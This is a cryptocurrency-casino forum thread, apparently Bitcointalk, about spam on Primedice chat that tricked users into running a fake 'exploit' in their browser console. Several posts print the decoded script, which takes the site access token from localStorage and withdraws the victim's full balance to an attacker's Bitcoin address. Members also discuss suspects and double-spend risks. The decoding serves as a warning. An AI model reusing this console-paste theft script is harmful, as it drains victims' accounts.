Primedice.com | Since 2013 | Longest Running Crypto Casino | 113 BTC Jackpot!

[waterpile]

Its his fault for falling such cheap tricks, don't click links that are suspicious or untrusted

[dooglus]

Wtf I just tried it and .4 BTC disappeared out of my accoun?

I tried decoding the 'exploit'.

I got this far:

Code:

calculate_nonce = function(seed) {
  return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
  calculate_nonce('users/1'), function(seed) {
    var key1 = 'amount'
    var key2 = 'address'
    var load = {};
    load[key1] = seed['user']['balance'];
    load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju';
    lut['post'](calculate_nonce('withdraw'), load);
  }
);

I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju.

Probably best not to run it...

Edit:

Wtf I just tried it and .4 BTC disappeared out of my accoun?

If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.

[Anony]

Wtf I just tried it and .4 BTC disappeared out of my accoun?

I tried decoding the 'exploit'.

I got this far:

Code:

calculate_nonce = function(seed) {
  return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
  calculate_nonce('users/1'), function(seed) {
    var key1 = 'amount'
    var key2 = 'address'
    var load = {};
    load[key1] = seed['user']['balance'];
    load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju';
    lut['post'](calculate_nonce('withdraw'), load);
  }
);

I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju.

Probably best not to run it...

Edit:

Wtf I just tried it and .4 BTC disappeared out of my accoun?

If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.

there were actually 2 different scripts being posted, one withdrawing to the address you mentioned above, and the other to 19Nft7skg4RdH7P43XYcCSYRzZwQiTy6PE which collected ~0.3btc

[WhatTheGox]

don't click links that are suspicious or untrusted

+1
dont ever click strange links, sometimes its tricky though i fell for one once at BTC-e which was cleverly disguised to mimic a bitcointalk.org link. 

[DiamondCardz]

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.

[snarlpill]

Kind of random, but 2 thoughts/comments-

@Stunna- Have you ever thought about doing "No Confirm" deposits, aka instant deposits, but just have to have at least 1 confirm before withdrawing?

And could anybody let me know how to sign up for the website owner 20% referral boost? I have sent an email or 2, no luck so far, but if there are stipulations could you please send them to support(@)cryptoplanet.co ?  86 referrals so far, but no whales yet- barely even tuna fish 

[ranochigo]

Kind of random, but 2 thoughts/comments-

@Stunna- Have you ever thought about doing "No Confirm" deposits, aka instant deposits, but just have to have at least 1 confirm before withdrawing?

And could anybody let me know how to sign up for the website owner 20% referral boost? I have sent an email or 2, no luck so far, but if there are stipulations could you please send them to support(@)cryptoplanet.co ?  86 referrals so far, but no whales yet- barely even tuna fish 

Instant deposits might not happen. People can deposit money then bet, if lost, double spend it immediately. If win, confirm it. This way, they can still withdraw the winning money. People can easily go to another account if they get banned due to double spending. This was what happened last time and PD lost some money because of this.

[B4RF]

Kind of random, but 2 thoughts/comments-

@Stunna- Have you ever thought about doing "No Confirm" deposits, aka instant deposits, but just have to have at least 1 confirm before withdrawing?

And could anybody let me know how to sign up for the website owner 20% referral boost? I have sent an email or 2, no luck so far, but if there are stipulations could you please send them to support(@)cryptoplanet.co ?  86 referrals so far, but no whales yet- barely even tuna fish 

Instant deposits might not happen. People can deposit money then bet, if lost, double spend it immediately. If win, confirm it. This way, they can still withdraw the winning money. People can easily go to another account if they get banned due to double spending. This was what happened last time and PD lost some money because of this.

And with the tipping function they can tip the money to another account and double spend it.

Might not be the best idea to implement this.

[MICRO]

Wow, shit , what i missed !

We need some mods for that timezone.

As from now , i will leave my skype on online and volume on max so people who have me on skype can wake me up when shit like this happens so i can try to stop the spam.

[WhatTheGox]

Im in UK timezone if that helps?

[Stunna]

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.

Yeah there's really no proof it was mdma so not much I can do. The code is arguably similar but couldn't someone have just edited his code and replaced it with malicious content?

Also thanks dooglus for decoding the malicious code.

[DiamondCardz]

I do have to say:

Also lost a fair few coins and I KNOW who is responsible for this, it's MDMA.

Why do I think it is MDMA? He's the only one with the coding language and this sort of knowledge about PD to create something like this. You can compare the script to his old PD2 bot and you'll see that the two are very similar. He is a smart guy, and he's committed a smart crime. HE IS RESPONSIBLE. If anyone wants the copy of his PD2 bot to compare I'm going to put it on paste bin as well as the malicious script to compare.

You know that MDMA is responsible because he has coding skills and that he coded a PD2 bot?

Meh. I'm sorry but you want to be a mod, yet you throw around frivolous accusations like this. It's bad etiquette. If you're going to accuse someone of doing something like this you need cold hard evidence rather than opinions and assumptions.

And why would you run some JS which claims to be an exploit? I do not have sympathy for you if you ran a program which claimed to be an exploit for PD, sorry. You could have at least skimmed over the code. (I heard that it was in source code form rather than executable)

And here is the JS that it gave you (DO NOT RUN THIS IN YOUR CONSOLE, LOOKING AT THE CODE DOES NOTHING BUT IF YOU RUN THIS IT'S YOUR OWN FAULT): http://pastie.org/9577897

Honestly, just skimming over the code and the fact he (or she) tried to hide it should set off alarm bells.

[MICRO]

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.

Yeah there's really no proof it was mdma so not much I can do. The code is arguably similar but couldn't someone have just edited his code and replaced it with malicious content?

MDMA was rly in some tough situation lately that's why he wasn't online much. But that doesn't mean he tried to scam.
I contacted him on skype but still didn't get any reply .

Until there is a good proof that was him, i wouldn't make any accusations.  

[MICRO]

I just done 0.1btc yolo bet on 1.5x just to be the only MOD on Primedice that has positive profit !

There is the bet: http://pd3.co/b/1072057346

And here is officially , only mod who is in positive profit ! Haha...


Oh btw, i tipped that 0.05 profit, most of it to mods and to quiz wallet, and rest to the people on chat so who was there got some tips. .

[williamj2543]

Congrats micro. You deserve a trophy

[DiamondCardz]

Not officially, I am technically +0.43 BTC profit due to the 1 billion bet competition

[dooglus]

The code is arguably similar but couldn't someone have just edited his code and replaced it with malicious content?

Yeah, not really even similar. "It's in the same language" is a funny argument, when JavaScript is the only language the browser runs...

Also thanks dooglus for decoding the malicious code.

No worries. I was curious to see what the script did.

I simplified it further:

Code:

function api(seed) {
    return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

jquery = window['$'];

jquery.getJSON(api('users/1'),
               function(seed) {
                   jquery.post(api('withdraw'), {amount: seed['user']['balance'],
                                                address: '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju'});
               });

[MICRO]

Not officially, I am technically +0.43 BTC profit due to the 1 billion bet competition

No , no , no , gambling stats wise u are negative !
But its not rly hard for u to get to + , almost same like for me , just 1 yolo bet .

[MICRO]

The code is arguably similar but couldn't someone have just edited his code and replaced it with malicious content?

Yeah, not really even similar. "It's in the same language" is a funny argument, when JavaScript is the only language the browser runs...

Also thanks dooglus for decoding the malicious code.

No worries. I was curious to see what the script did.

I simplified it further:

Code:

function api(seed) {
    return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

jquery = window['$'];

jquery.getJSON(api('users/1'),
               function(seed) {
                   jquery.post(api('withdraw'), {amount: seed['user']['balance'],
                                                address: '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju'});
               });

Simple but doing the job.

Oh btw dooglus i see ur sig space is empty...

How much for me to rent it to say :
"MICRO is the best mod ever @ Primedice"
 
Haha... JK, JK...

[LabKitty]

Just opened for the lulz Primedice on Samsung Galaxy Tab 4 10.1 16GB. There is no menu, half of the links ain working :p
Chrome/Firefox/Internet.